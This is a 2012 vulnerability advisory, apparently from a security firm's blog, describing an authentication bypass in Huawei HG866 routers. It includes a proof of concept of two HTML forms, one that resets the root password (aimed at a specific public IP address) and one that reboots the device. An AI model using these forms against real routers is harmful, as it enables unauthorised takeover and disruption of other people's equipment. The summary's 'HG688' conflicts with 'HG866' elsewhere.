Huawei HG866 authentication bypass

Huawei HG866 authentication bypass

Posted on Jun 15 2012   |  Plain text version

Summary

The web management interface of Huawei HG688 routers has several pages which fail to validate the user's session. This allows an attacker to bypass the authentication both locally and remotely.

Description

Equipment ID: EchoLife:HG866
Hardware Version: HG866GTA_VER.C, 01, 02
Software Version: V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16
Severity: High
Impact: Authentication Bypass
Attack vector: Remote
Solution: N/A
Reference: N/A


The Huawei HG866 router comes with a web management interface, ports 4FE+2POTS+WIFI+2USB, optical interface GPON, SC/APC.

The administrative web interface has pages that fail to validate the user's session, which allows the authentication to be bypassed both locally and remotely.

Due to the lack of session validation, it is possible to change the administrator's password by sending a POST request to the URL: /html/password.html.

POC

<!--Change root password to password --!>
<form name=hg866bypass action=http://187.162.144.50/html/password.html method=post >
<input name=psw value=password ><input name=reenterpsw value=password >
<input type="submit" name="save" value="Apply" />
</form>

<!--Reboot the device --!>
<form name=hg866dos action=http://192.168.100.251/html/admin_reboot.html" method="post">
<input type=submit name=save id=save value=Reboot />
</form>







Pedro Joaquín
[email protected]


Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.